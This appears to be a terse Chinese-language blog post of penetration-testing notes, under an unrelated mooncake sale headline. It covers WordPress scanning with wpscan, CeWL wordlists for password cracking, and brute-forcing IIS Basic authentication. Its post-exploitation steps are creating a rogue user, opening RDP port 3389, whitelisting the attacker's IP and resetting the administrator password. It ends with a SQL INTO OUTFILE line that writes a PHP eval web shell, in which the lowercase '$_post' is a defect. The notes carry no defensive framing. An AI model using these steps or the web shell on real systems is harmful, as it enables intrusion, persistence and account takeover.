百年老字號:知味觀月餅 4 塊 7.9 元(5 折速囤)
阿新 • • 發佈:2021-08-14
碰到wordpress 框架的 使用 kalilinux 裡面的wpscan進行掃描
cewl kali自帶的密碼生成工具
Cewl介紹:
.
cewl是一個ruby應用,爬行指定url的指定深度。也可以跟一個外部連結,結果會返回一個單詞列表,這個列表可以扔到John the ripper工具裡進行密碼破解。cewl還有一個相關的命令列工具應用FAB,它使用相同的元資料提取技術從已下載的列表中建立作者/建立者列表。
web.config 儲存著資料庫的資訊
資料庫提權:
建立使用者 新增使用者到使用者組
開啟3389埠
開啟防火牆白名單 把自己的ip放進去
也可以更改administrator的密碼
九頭蛇和美杜莎 可以進行IIS的認證爆破
當http頭出現
Authorization: Basic MTE6MTE=
則說明有IIS認證,用蟻劍連線的時候也需要進行base64編碼 同時加入Authorization: Basic MTE6MTE=
資料庫getshell
select "<?php eval($_post['cmd']);?>" into outfile "檔案路徑/1.php"